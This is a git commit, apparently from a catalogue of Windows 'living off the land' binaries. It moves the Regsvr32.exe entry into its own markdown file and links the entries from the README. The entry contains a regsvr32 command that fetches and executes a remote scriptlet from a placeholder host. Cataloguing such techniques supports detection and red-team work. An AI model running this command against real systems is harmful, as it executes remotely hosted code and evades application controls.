master
api0cradle 2018-04-18 15:04:54 +02:00
parent 37b53875b9
commit df25324fe6
2 changed files with 15 additions and 16 deletions

View File

@ -5,22 +5,8 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OS BINARIES
#include "OSBinaries/Rundll32.md"
[this subtext](OSBinaries/Rundll32.md)
## Regsvr32.exe
* Functions: Execute
```
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
```
Acknowledgements:
* Casey Smith - @subtee
[Rundll32.exe](OSBinaries/Rundll32.md)
[Regsvr32.exe](OSBinaries/Regsvr32.md)
## Msbuild.exe

13
OSBinaries/Regsvr32.md Normal file
View File

@ -0,0 +1,13 @@
## Regsvr32.exe
* Functions: Execute
```
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
```
Acknowledgements:
* Casey Smith - @subtee